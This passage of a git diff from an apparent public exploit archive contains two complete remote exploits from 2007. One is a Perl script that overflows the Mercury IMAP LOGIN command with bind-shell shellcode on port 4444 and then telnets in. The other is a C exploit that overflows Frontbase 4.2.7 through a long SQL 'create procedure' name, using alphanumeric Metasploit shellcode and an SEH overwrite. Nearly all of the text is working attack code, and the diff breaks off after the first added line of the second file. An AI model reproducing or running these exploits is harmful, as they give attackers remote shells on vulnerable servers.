-print " 2 - Windows 2k Sp4 Italian Version\n";
-print " 3 - Windows XP Sp1 English Version\n";
-print " 4 - Windows XP Sp0 English Version\n";
-print " If values not specified, Windows 2k Sp4 will be used.\n";
-print " Example : ./mercury-4444-multi.pl -h127.0.0.1 -o1 -o1\n";
-print "--------------------------------------------------------------------\n";
-}
-
-use IO::Socket::INET;
-
-my $host = 10.0.0.2;
-my $port = 143;
-my $reply;
-my $request;
-my $jmp="\xe9\x02\xff\xff\xff";
-
-my $nextseh = "\x90\x90\xeb\x09";
-
-
-
-#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
-#1)bind port, in this exploit is 4444 in the original shellcode was 6666
-#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
-my $shellcode = 
-"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
-"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
-"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
-"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
-"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
-"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
-"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
-"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
-"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
-"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
-"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
-"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
-"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";
-
-
-
-
-
-
-foreach (@ARGV) {
-$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
-$seh = $1 if ($_=~/-o(.*)/);
-$happy = $1 if ($_=~/-o(.*)/);
-}
-
-switch ($seh) {
-case 1 { $seh="\x43\x8f\x2d\x7c" } # Win2k SP4 English version jmp ebx in advapi32.dll
-case 2 { $seh="\x43\x8f\x26\x79" } # Win2k SP4 Italian version jmp ebx in advapi32.dll
-case 3 { $seh="\xc0\x5f\x3c\x76" } # WinXP Pro English SP1 version pop ecx pop ecx ret in comdlg32.dll
-case 4 { $seh="\xfc\x61\x3c\x76" } # WinXP Pro English SP0 version pop ecx pop ecx ret in comdlg32.dll
-}
-
-
-switch ($happy) {
-case 1 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 English version
-case 2 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 Italian version
-case 3 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP1 version
-case 4 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP0 version
-}
-
-my $request ="1 LOGIN".(" "x948)."\{255\}\n";
-
-
-
-my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
-$socket or die "Cannot connect to host!\n";
-
-recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
-
-send $socket, $request, 0;
-print "[+] Sent 1st request\n";
-recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
-sleep(1);
-
-
-
-my $request ="\x41" x 255;
-
-send $socket, $request, 0;
-print "[+] Sent 2nd request\n";
-sleep(1);
-
-my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
-
-send $socket, $request, 0;
-print "[+] Sent final request\n";
-sleep(1);
-
-close($socket);
-
-print " + connect on port 4444 of $host ...\n";
-sleep(3);
-system("telnet $host 4444");
-exit;
-
-# milw0rm.com [2007-03-24]
+#!/usr/bin/perl
+# 
+# http://www.securityfocus.com/bid/11775
+# credit to Muts for this vulnerability
+# acaro [at] jervus.it
+
+
+use IO::Socket::INET;
+use Switch;
+
+if (@ARGV < 3) {
+print "--------------------------------------------------------------------\n";
+print "Usage : mercury-4444-multi.pl -hTargetIPAddress -oAssemblyinstructions\n";
+print " Return address: \n";
+print " 1 - Windows 2k Sp4 English Version\n";
+print " 2 - Windows 2k Sp4 Italian Version\n";
+print " 3 - Windows XP Sp1 English Version\n";
+print " 4 - Windows XP Sp0 English Version\n";
+print " If values not specified, Windows 2k Sp4 will be used.\n";
+print " Example : ./mercury-4444-multi.pl -h127.0.0.1 -o1 -o1\n";
+print "--------------------------------------------------------------------\n";
+}
+
+use IO::Socket::INET;
+
+my $host = 10.0.0.2;
+my $port = 143;
+my $reply;
+my $request;
+my $jmp="\xe9\x02\xff\xff\xff";
+
+my $nextseh = "\x90\x90\xeb\x09";
+
+
+
+#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
+#1)bind port, in this exploit is 4444 in the original shellcode was 6666
+#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
+my $shellcode = 
+"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
+"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
+"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
+"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
+"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
+"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
+"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
+"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
+"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
+"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
+"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
+"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
+"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";
+
+
+
+
+
+
+foreach (@ARGV) {
+$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
+$seh = $1 if ($_=~/-o(.*)/);
+$happy = $1 if ($_=~/-o(.*)/);
+}
+
+switch ($seh) {
+case 1 { $seh="\x43\x8f\x2d\x7c" } # Win2k SP4 English version jmp ebx in advapi32.dll
+case 2 { $seh="\x43\x8f\x26\x79" } # Win2k SP4 Italian version jmp ebx in advapi32.dll
+case 3 { $seh="\xc0\x5f\x3c\x76" } # WinXP Pro English SP1 version pop ecx pop ecx ret in comdlg32.dll
+case 4 { $seh="\xfc\x61\x3c\x76" } # WinXP Pro English SP0 version pop ecx pop ecx ret in comdlg32.dll
+}
+
+
+switch ($happy) {
+case 1 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 English version
+case 2 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 Italian version
+case 3 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP1 version
+case 4 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP0 version
+}
+
+my $request ="1 LOGIN".(" "x948)."\{255\}\n";
+
+
+
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
+$socket or die "Cannot connect to host!\n";
+
+recv($socket, $reply, 1024, 0);
+print "Response:" . $reply;
+
+send $socket, $request, 0;
+print "[+] Sent 1st request\n";
+recv($socket, $reply, 1024, 0);
+print "Response:" . $reply;
+sleep(1);
+
+
+
+my $request ="\x41" x 255;
+
+send $socket, $request, 0;
+print "[+] Sent 2nd request\n";
+sleep(1);
+
+my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
+
+send $socket, $request, 0;
+print "[+] Sent final request\n";
+sleep(1);
+
+close($socket);
+
+print " + connect on port 4444 of $host ...\n";
+sleep(3);
+system("telnet $host 4444");
+exit;
+
+# milw0rm.com [2007-03-24]
diff --git a/platforms/windows/remote/3575.cpp b/platforms/windows/remote/3575.cpp
index b146fef87..37f30c79d 100755
--- a/platforms/windows/remote/3575.cpp
+++ b/platforms/windows/remote/3575.cpp
@@ -1,529 +1,529 @@
-/* Dreatica-FXP crew
-* 
-* ----------------------------------------
-* Target         : Frontbase <= 4.2.7 for Windows
-* Site           : http://www.frontbase.com
-* Found by       : Netragard, L.L.C Advisory
-* ----------------------------------------
-* Exploit date   : 25.03.2007
-* Exploit writer : Heretic2 (heretic2x@gmail.com)
-* OS             : Windows 2000 SP4 (will add other later)
-* Crew           : Dreatica-FXP
-* ----------------------------------------
-* Info:
-*    The last Windows version of Frontbase that you can found on official site www.frontbase.com
-* is the 4.2.7d and this version is patched, so the exploit will not work here, i have tested that 
-* exploit on the 4.2.7 version under Windows 2000 SP4 (not patched) and it is working good.
-* 
-* The exploitation, as said in advisory, of this bug is easy: SEH and EIP overwrite methods.
-* but in 'real' life the exploitation is more difficult, cause the server allows only alphanumeric
-* bytes, like: 0x01 0x02 ... 0x7e 0x7f .
-* other bytes: 0x80 ... 0xff come to server transformed:
-*  0xEB will transform in two bytes 0xC2 0xAB
-*  0xFF will transform in two bytes 0xC3 0xBF
-* and etc...
-* 
-* so the exploitation become more difficult here, however in one place of buffer i send to the server byte 
-* 0xff, with assumptions that i will get the bytes 0xC3 0xBF and that the buffer will be one byte longer.
-* 
-* for the correct exploitation i used some code from win32 SEH GetPC project and metasploit for the shellcodes.
-* 
-* so the exploit is:
-*    send 3115 bytes to server + address to overwrite SEH.
-*    in my case i sent 3114 bytes, cause one 0xff transformed in 2 symbols
-* 
-* ----------------------------------------
-* Compiling:
-*  To compile this exploit you need:
-*    1. C:\usr\FrontBase\Include\FBCAccess copy to exploit folder.
-*    2. Copy from C:\usr\FrontBase\lib\ file FBCAccess.lib to your exploit folder.
-*    3. Select FBCAccess.lib in linker options
-*    4. Compile.
-* ----------------------------------------
-* Thanks to:
-*       Netragard, L.L.C Advisory   ( http://www.netragard.com -- "We make I.T. Safe." )
-*       The Metasploit project      ( http://metasploit.com                            ) 
-*       win32 SEH GetPC project     (                                                  ) 
-*       Dreatica-FXP crew           (                                                  )
-* ----------------------------------------
-*
-*/
-
-#include 
-#include 
-#include 
-#include 
-#pragma comment(lib,"ws2_32")
-#include "FBCAccess/FBCAccess.h"
-
-void usage(char * s);
-void logo();
-void prepare_shellcode(unsigned char * fsh, int sh);
-void make_buffer(char * buf, int itarget, int sh);
-int  validate_args( int port, int sh, int itarget);
-int  send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf);
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring);
-char	*optarg;		// global argument pointer
-int		optind = 0, opterr; 	// global argv index
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-struct {
-	const char *t ;
-	unsigned long ret ;
-} targets[]= 
-		{								
-			// we need alphanumeric addreses so this one found in MSVCRT.dll (there are a lot in it) 
-			{"Windows 2000 SP4 no patches, MSVCRT.dll",				0x78014c40 },//pop, pop, ret
-			{"Windows 2000 SP4 no pathces, MSVCRT.dll",						0x7803382b },//jmp ebx
-			{NULL,													0x00000000 }
-		};
-
-struct {
-	const char * name;
-	char * shellcode;
-}shellcodes[]={ 	
-	 {"Spawn bindshell on port 4444", 
-		 /* modified win32_bind -  EXITFUNC=seh LPORT=4444 Encoder=Alpha2 http://metasploit.com 
-		    first jmp instructions replaced by alphanumeric code taken from the win32 SEH GetPC project. */
-		"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48\x50\x68"
-		"\x59\x41\x41\x51\x68\x5A\x59\x59\x59\x59\x41\x41\x51\x51\x44\x44"
-		"\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58\x56\x6A\x30\x50\x50\x54"
-		"\x55\x50\x50\x61\x33\x30\x31\x30\x38\x39\x49\x49\x49\x49\x49\x49"
-		"\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66"
-		"\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x76\x32\x42\x42\x32\x41"
-		"\x41\x30\x41\x41\x42\x58\x50\x38\x42\x42\x75\x38\x69\x39\x6c\x52"
-		"\x4a\x5a\x4b\x42\x6d\x68\x68\x48\x79\x4b\x4f\x6b\x4f\x4b\x4f\x65"
-		"\x30\x6c\x4b\x30\x6c\x31\x34\x71\x34\x4e\x6b\x42\x65\x65\x6c\x6e"
-		"\x6b\x53\x4c\x43\x35\x62\x58\x55\x51\x4a\x4f\x4e\x6b\x72\x6f\x54"
-		"\x58\x6c\x4b\x51\x4f\x77\x50\x53\x31\x78\x6b\x43\x79\x4e\x6b\x54"
-		"\x74\x6c\x4b\x35\x51\x6a\x4e\x64\x71\x6f\x30\x6e\x79\x6e\x4c\x6d"
-		"\x54\x6f\x30\x64\x34\x55\x57\x4f\x31\x59\x5a\x36\x6d\x36\x61\x59"
-		"\x52\x5a\x4b\x4c\x34\x37\x4b\x62\x74\x47\x54\x46\x48\x70\x75\x4d"
-		"\x35\x6c\x4b\x73\x6f\x64\x64\x33\x31\x4a\x4b\x43\x56\x4c\x4b\x44"
-		"\x4c\x62\x6b\x6e\x6b\x63\x6f\x57\x6c\x65\x51\x6a\x4b\x77\x73\x56"
-		"\x4c\x6c\x4b\x6e\x69\x62\x4c\x44\x64\x45\x4c\x55\x31\x6f\x33\x44"
-		"\x71\x6b\x6b\x51\x74\x4e\x6b\x53\x73\x30\x30\x4e\x6b\x57\x30\x34"
-		"\x4c\x6c\x4b\x64\x30\x37\x6c\x4e\x4d\x6c\x4b\x53\x70\x73\x38\x73"
-		"\x6e\x30\x68\x4c\x4e\x62\x6e\x74\x4e\x38\x6c\x30\x50\x79\x6f\x6a"
-		"\x76\x51\x76\x30\x53\x42\x46\x72\x48\x35\x63\x45\x62\x33\x58\x64"
-		"\x37\x64\x33\x74\x72\x43\x6f\x33\x64\x4b\x4f\x78\x50\x52\x48\x38"
-		"\x4b\x7a\x4d\x4b\x4c\x57\x4b\x62\x70\x69\x6f\x6e\x36\x71\x4f\x6e"
-		"\x69\x4b\x55\x33\x56\x6c\x41\x4a\x4d\x76\x68\x74\x42\x63\x65\x51"
-		"\x7a\x77\x72\x4b\x4f\x4a\x70\x63\x58\x6e\x39\x35\x59\x6b\x45\x4e"
-		"\x4d\x30\x57\x4b\x4f\x38\x56\x50\x53\x50\x53\x42\x73\x51\x43\x70"
-		"\x53\x70\x43\x32\x73\x52\x63\x76\x33\x59\x6f\x6e\x30\x55\x36\x33"
-		"\x58\x76\x71\x71\x4c\x63\x56\x56\x33\x6e\x69\x59\x71\x4e\x75\x55"
-		"\x38\x4c\x64\x55\x4a\x72\x50\x6b\x77\x56\x37\x4b\x4f\x4e\x36\x53"
-		"\x5a\x56\x70\x32\x71\x33\x65\x69\x6f\x4e\x30\x62\x48\x39\x34\x4c"
-		"\x6d\x74\x6e\x4a\x49\x63\x67\x69\x6f\x79\x46\x43\x63\x36\x35\x6b"
-		"\x4f\x68\x50\x35\x38\x5a\x45\x70\x49\x6d\x56\x70\x49\x41\x47\x6b"
-		"\x4f\x68\x56\x56\x30\x41\x44\x33\x64\x71\x45\x69\x6f\x4e\x30\x4d"
-		"\x43\x53\x58\x5a\x47\x70\x79\x6b\x76\x73\x49\x41\x47\x49\x6f\x4e"
-		"\x36\x63\x65\x4b\x4f\x4e\x30\x53\x56\x50\x6a\x35\x34\x53\x56\x41"
-		"\x78\x61\x73\x30\x6d\x4c\x49\x4b\x55\x72\x4a\x72\x70\x76\x39\x45"
-		"\x79\x58\x4c\x6b\x39\x59\x77\x31\x7a\x67\x34\x4c\x49\x49\x72\x70"
-		"\x31\x6f\x30\x6c\x33\x6f\x5a\x69\x6e\x72\x62\x36\x4d\x4b\x4e\x53"
-		"\x72\x34\x6c\x6a\x33\x6e\x6d\x62\x5a\x36\x58\x6c\x6b\x4c\x6b\x4e"
-		"\x4b\x61\x78\x30\x72\x6b\x4e\x6d\x63\x46\x76\x4b\x4f\x44\x35\x32"
-		"\x64\x39\x6f\x38\x56\x51\x4b\x70\x57\x52\x72\x70\x51\x32\x71\x53"
-		"\x61\x42\x4a\x43\x31\x56\x31\x46\x31\x70\x55\x43\x61\x79\x6f\x6a"
-		"\x70\x62\x48\x6e\x4d\x59\x49\x67\x75\x7a\x6e\x33\x63\x39\x6f\x59"
-		"\x46\x63\x5a\x59\x6f\x4b\x4f\x76\x57\x6b\x4f\x6a\x70\x4c\x4b\x61"
-		"\x47\x59\x6c\x6b\x33\x38\x44\x43\x54\x49\x6f\x58\x56\x36\x32\x59"
-		"\x6f\x4e\x30\x43\x58\x68\x70\x4f\x7a\x54\x44\x73\x6f\x71\x43\x4b"
-		"\x4f\x4e\x36\x6b\x4f\x78\x50\x66"
-	 },	 
-	{NULL , NULL }
-};
-
-// alphanumeric long back jump, using SEH method!
-char jmptoshellcode[]=
-	// at the time of jump we have in EBX the address where we jumped after SEH exploitation
-	// so we can use it to jump [EBX-0C20]
-	"\x56\x54\x58\x36\x33\x30\x56\x58\x50\x50\x5f\x53\x58\x66\x2d\x20" 
-	"\x0C\x50\x59\x58\x64\x33\x3f\x64\x31\x38\x51\x57\x64\x31\x20\x6c";
-
-
-int main(int argc, char **argv)
-{
-	char temp1[100], temp2[100];
-	char * remotehost=NULL, * user=NULL, * password=NULL, * database=NULL, * dbpassword=NULL;
-	char default_remotehost[]="127.0.0.1";
-	char default_user[]="_SYSTEM";
-	char default_password[]="";
-	char default_database[]="";
-	char default_dbpassword[]="";
-	int port, itarget, sh;
-	char c;		
-	logo();
-	if(argc<2)
-	{
-		usage(argv[0]);		
-		return -1;
-	}
-	// set defaults		
-	port=-1;
-	itarget=0;
-	sh=0;
-	// ------------		
-	while((c = getopt(argc, argv, "h:p:s:t:u:P:d:D:"))!= EOF)
-	{
-		switch (c)
-		{
-			case 'h':
-				remotehost=optarg;
-				break; 	
-			case 's':
-				sscanf(optarg, "%d", &sh);
-				sh--;
-				break;
-			case 't':
-				sscanf(optarg, "%d", &itarget);
-				itarget--;
-				break;
-			case 'p':
-				sscanf(optarg, "%d", &port);
-				break;		
-			case 'u':
-				user=optarg;
-				break; 
-			case 'P':
-				password=optarg;
-				break; 
-			case 'd':
-				database=optarg;
-				break; 
-			default:
-	            usage(argv[0]);
-			return -1;
-		}		
-	}
-	if(validate_args( port, sh, itarget)==-1) return -1;
-	if(remotehost == NULL) remotehost=default_remotehost;
-	if(user       == NULL) user=default_user;
-	if(password   == NULL) password=default_password;
-	if(dbpassword == NULL) dbpassword=default_dbpassword;
-	if(database   == NULL) database=default_database;
-
-	memset(temp1,0,sizeof(temp1));
-	memset(temp2,0,sizeof(temp2));
-	memset(temp1, '\x20' , 58 - strlen(remotehost) -1);	
-	printf(" #  Host    : %s%s# \n", remotehost, temp1);	
-	if(port!=-1)
-	{
-		sprintf(temp2, "%d", port);
-		memset(temp1,0,sizeof(temp1));
-		memset(temp1, '\x20' , 58 - strlen(temp2) -1);
-		printf(" #  Port    : %s%s# \n", temp2, temp1);
-	}else
-	{
-		sprintf(temp2, "%s", database);
-		memset(temp1,0,sizeof(temp1));
-		memset(temp1, '\x20' , 58 - strlen(temp2) -1);
-		printf(" #  Database: %s%s# \n", temp2, temp1);
-	}
-	sprintf(temp2, "%s", user);
-	memset(temp1,0,sizeof(temp1));
-	memset(temp1, '\x20' , 58 - strlen(temp2) -1);
-	printf(" #  User    : %s%s# \n", temp2, temp1);
-	sprintf(temp2, "%s", database);
-	memset(temp1,0,sizeof(temp1));
-	memset(temp1, '\x20' , 58 - strlen(temp2) -1);
-	printf(" #  Database: %s%s# \n", temp2, temp1);
-	memset(temp1,0,sizeof(temp1));	
-	memset(temp2,0,sizeof(temp2));
-	sprintf(temp2, "%s", shellcodes[sh].name );
-	memset(temp1, '\x20' , 58 - strlen(temp2) -1);	
-	printf(" #  Shellcde: %s%s# \n", temp2, temp1);	
-	memset(temp1,0,sizeof(temp1));	
-	memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);	
-	printf(" #  Target  : %s%s# \n", targets[itarget].t, temp1);	
-	printf(" # ------------------------------------------------------------------- # \n");
-	fflush(stdout);
-	
-	char buf[20000];
-	memset(buf,0,sizeof(buf));
-	printf("[+] Constructing attacking buffer... ");
-	fflush(stdout);
-	make_buffer((char *)buf,itarget,sh);
-	printf("done\n");
-
-	if(send_buffer(remotehost,port, user, password, dbpassword, database, buf)==-1)
-	{
-		fprintf(stdout, "[-] Cannot exploit server %s\n", remotehost);		
-		return -1;
-	}
-	return 0;
-}
-
-int validate_args(int port, int sh, int itarget)
-{
-	int i=0,x=0;
-	for(i=0;shellcodes[i].name;i++)if(i==sh)x=1;
-    if(x==0)
-	{
-		printf("[-] The shellcode number is invalid\n");
-		return -1;
-	}	
-	x=0;
-	for(i=0;targets[i].t;i++)if(i==itarget)x=1;
-	if(x==0)
-	{
-		printf("[-] The target is invalid\n");
-		return -1;
-	}	
-	return 1;
-}
-
-void prepare_shellcode( char * fsh, int sh)
-{
-	memcpy(fsh, shellcodes[sh].shellcode, strlen(shellcodes[sh].shellcode));	
-}
-
-void make_buffer(char * buf, int itarget, int sh)
-{
-	// -=[ prepare shellcode ]=-
-	char * fsh;
-	fsh = (char *) malloc ((strlen(shellcodes[sh].shellcode)+1) );
-	memset(fsh, 0, (strlen(shellcodes[sh].shellcode)+1));	
-	prepare_shellcode(fsh, sh);
-	// -----------------
-	
-    // -=[ fill buffer here  ]=-
-	memset(buf,0,sizeof(buf));
-	char * cp = buf;
-
-		// make vulnerable sql92 command to get exploit
-	strcat(buf, "create procedure \"");
-	cp=buf+strlen(buf);	
-
-		// some useless bytes
-	memset(cp, 'A', 7);  
-	cp+=strlen((char *)cp);
-
-		// shellcode
-	memcpy(cp, fsh, strlen(fsh));
-	cp+=strlen((char *)cp);
-
-		// fill after shellcode
-	memset(cp, 'A', 3045-strlen(fsh));  
-	cp+=strlen((char *)cp);
-
-		// alphanumeric long jump to our shellcode at the start of the buffer
-	memcpy(cp, jmptoshellcode, strlen(jmptoshellcode));
-	cp+=strlen((char *)cp);
-	memset(cp, 'A', 59-strlen(jmptoshellcode));  
-	cp+=strlen((char *)cp);
-	
-		// at this place in stack points EBX and RET will go here, so we need to jmp upper 
-		// to prepare alphanumeric long jump
-
-	*cp++ = '\x74'; // JNE ... at this point JNE will jump cause the last CMP was 'not equal'
-	*cp++ = '\xff'; // this is not alphanumeric , but the server will transform \xff -> \xC3\xBF
-					// so this will give us the JNE C3 and we will jump upper for 59 bytes
-					// where we put a longer jump to our shellcode. This will add one byte more 
-					// so we will send not 3115, but 3114 bytes to overwrite SEH.
-	*cp++ = '\x41'; 
-
-		// SEH chain overwrite
-	*cp++ = (char)((targets[itarget].ret      ) & 0xff);
-	*cp++ = (char)((targets[itarget].ret >>  8) & 0xff);
-	*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
-	*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
-	
-		// end of the sql92 command
-	memcpy(cp, "\"()\n begin\n end;", strlen("\"()\n begin\n end;"));
-
-	// -----------------
-}
-
-int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf)
-{
-	FBCDatabaseConnection * fbdc;
-	FBCMetaData *meta;
-	char sesn[]="dreatica-fxp";   
-	if(database!=NULL) port = -1;
-	fbcInitialize();	
-   	if (port!=-1)
-	{
-		printf("[+] Connecting to %s:%d\n", host, port);
-		fbdc = fbcdcConnectToDatabaseUsingPort(host, port, dbpassword); 
-	}else
-	{
-		printf("[+] Connecting to %s to database %s\n", host, database);
-		fbdc = fbcdcConnectToDatabase(database, host, dbpassword);
-	}
-	if (fbdc == NULL)
-	{
-		printf("[-] Cannot connect to %s\n", host);
-		return -1;
-	}	
-	char * session_name=sesn;
-	meta = fbcdcCreateSession(fbdc, session_name, user, password, "system_user");
-	if (fbcmdErrorsFound(meta) != 0)
-	{
-		printf("[-] Failed to create session\n");
-		FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta);
-		char* msgs = fbcemdAllErrorMessages(emd);		
-		fbcemdRelease(emd);
-		free(msgs);
-		fbcmdRelease(meta);
-		fbcdcClose(fbdc);
-		fbcdcRelease(fbdc);
-		return -1;
-	}   
-	fbcmdRelease(meta);
-	printf("[+] Sending %d bytes of buffer to server, check the shell\n", strlen(buf));
-		// if exploit success, the app will stop here.
-	meta = fbcdcExecuteDirectSQL(fbdc, buf);
-	if (fbcmdErrorsFound(meta) != 0)
-	{
-		printf("[-] Failed to send buffer\n");
-		FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta);
-		char* msgs = fbcemdAllErrorMessages(emd);		
-		fbcemdRelease(emd);
-		free(msgs);
-		fbcmdRelease(meta);
-		fbcdcClose(fbdc);
-		fbcdcRelease(fbdc);
-		return -1;
-	}
-	fbcmdRelease(meta);
-	return 1;
-}
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring)
-{
-	static char *next = NULL;
-	if (optind == 0)
-		next = NULL;
-
-	optarg = NULL;
-
-	if (next == NULL || *next == '\0')
-	{
-		if (optind == 0)
-			optind++;
-
-		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
-		{
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		if (strcmp(argv[optind], "--") == 0)
-		{
-			optind++;
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		next = argv[optind];
-		next++;		// skip past -
-		optind++;
-	}
-
-	char c = *next++;
-	char *cp = strchr(optstring, c);
-
-	if (cp == NULL || c == ':')
-		return '?';
-
-	cp++;
-	if (*cp == ':')
-	{
-		if (*next != '\0')
-		{
-			optarg = next;
-			next = NULL;
-		}
-		else if (optind < argc)
-		{
-			optarg = argv[optind];
-			optind++;
-		}
-		else
-		{
-			return '?';
-		}
-	}
-
-	return c;
-}
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-
-
-
-void usage(char * s)
-{	
-	printf(" Usage:\n");
-	printf("    %s -h  -p  -s  -t  -u  -p  -d  -D \n", s);
-    printf(" ----------------------------------------------------------------------- \n");
-	printf(" Arguments:\n");
-	printf("\n");
-	printf("      -h        the host IP to attack\n");
-	printf("      -p        the port of server      (default: -1     )\n");
-	printf("      -s   shellcode number        (default: 0      )\n");
-	printf("      -t      target number           (default: 0      )\n");
-	printf("      -t      target number           (default: 0      )\n");
-	printf("      -u        user name of frontbase  (default: _SYSTEM)\n");
-	printf("      -p    user password           (default: )\n");
-	printf("      -d    database (if port = -1) (default: )\n");
-	printf("      -d  database password       (default: )\n");
-	printf("\n");
-	printf("    Shellcodes:\n");
-	for(int i=0; shellcodes[i].name!=0;i++)
-	{
-		printf("      %d. %s Size=%d\n",i+1,shellcodes[i].name, strlen(shellcodes[i].shellcode));				
-	}	
-	printf("\n");
-	printf("    Targets:\n");
-	for(int j=0; targets[j].t!=0;j++)
-	{
-		printf("      %d. %s\n",j+1,targets[j].t);
-	}		
-	printf("\n");
-	printf(" Examples:\n");
-	printf("    %s -h 127.0.0.1 -d NewDB\n", s);
-	printf("    %s -h 127.0.0.1 -p 1155 -u root -p dta -D dta -t 1\n", s);
-	printf(" ----------------------------------------------------------------------- \n");	
-	
-	
-}
-
-void logo()
-{
-	printf(" ####################################################################### \n");	
-	printf(" #     ____                 __  _                  ______  __    _____ #\n");
-	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
-	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
-	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
-	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
-	printf(" #                                 crew                                #\n");
-	printf(" ####################################################################### \n");	
-	printf(" #  Exploit : Frontbase <= 4.2.7 for Windows                           # \n");
-	printf(" #  Author  : Heretic2 (heretic2x@gmail.com)                           # \n");
-	printf(" #  Version : 1.1                                                      # \n");
-	printf(" #  System  : Windows 2000 SP4                                         # \n");
-	printf(" #  Date    : 25.03.2007                                               # \n");
-	printf(" # ------------------------------------------------------------------- # \n");
-}
-
-// milw0rm.com [2007-03-25]
+/* Dreatica-FXP crew
